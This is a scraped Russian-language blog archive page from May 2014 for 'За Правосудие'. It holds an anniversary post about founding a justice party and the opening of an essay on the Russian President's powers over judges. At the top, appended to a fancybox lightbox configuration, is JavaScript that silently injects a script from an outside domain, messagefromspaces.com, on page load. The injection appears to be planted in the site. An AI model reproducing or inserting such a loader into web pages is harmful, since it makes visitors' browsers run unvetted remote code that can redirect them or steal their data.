, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Архив за мая, 2014

Блогу «За Правосудие» сегодня исполнилось два года

20 мая

Поздравляю с этим событием всех читателей блога. Несмотря на то, что в стране ежегодно около 7 миллионов пострадавших от преступлений не получают статус «потерпевший»; что, по словам Генерального прокурора России Ю. Чайки, более 14 тысяч незаконно осуждено, а около 5 тысяч незаконно арестовано, так и не нашлось 500 человек для создания партии «За Правосудие», основной целью которой было установление в стране власти Конституции России, обеспеченной ПРАВОСУДИЕМ, но работа по созданию партии продолжается.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Правомочен ли Президент России, обеспечить подчинение судей требованиям Конституции РФ и иных законов?

06 мая

Ответ на данный вопрос можно получить, сделав анализ полномочий Президента России, действующего законодательства и практики его применения при осуществлении правосудия.

12 декабря 1993 г. многонациональный народ России, утверждая, что человек, его права и свободы есть высшая ценность, всенародным голосованием принял Конституцию Российской Федерации, в которой (статья 11) записано, что государственную власть в Российской Федерации осуществляет Президент РФ, Федеральное Собрание, Правительство РФ и суды РФ.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки